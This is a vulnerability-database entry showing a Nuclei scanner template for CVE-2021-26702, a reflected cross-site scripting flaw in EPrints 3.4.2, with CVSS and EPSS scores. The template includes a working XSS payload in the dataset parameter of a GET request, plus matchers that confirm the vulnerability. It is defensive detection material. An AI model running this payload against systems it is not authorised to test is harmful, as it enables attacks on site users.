Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-26702
HistoryJul 05, 2022 - 5:36 p.m.

EPrints 3.4.2 - Cross-Site Scripting

2022-07-0517:36:53
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

56.1%

EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.

id: CVE-2021-26702

info:
  name: EPrints 3.4.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
  reference:
    - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
    - https://files.eprints.org/2548/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26702
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/grymer/CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-26702
    cwe-id: CWE-79
    epss-score: 0.00187
    epss-percentile: 0.55848
    cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eprints
    product: eprints
  tags: cve2021,cve,xss,eprints

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098e7757e0209c423c0f1d06f2a709c9a2fbb69786899327e00431406bc1f66bf022100d79b72cb3177fc66ea667fdcef9bedab883b9acdac3ab0dcafadf79321973aa1:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

56.1%

Related for NUCLEI:CVE-2021-26702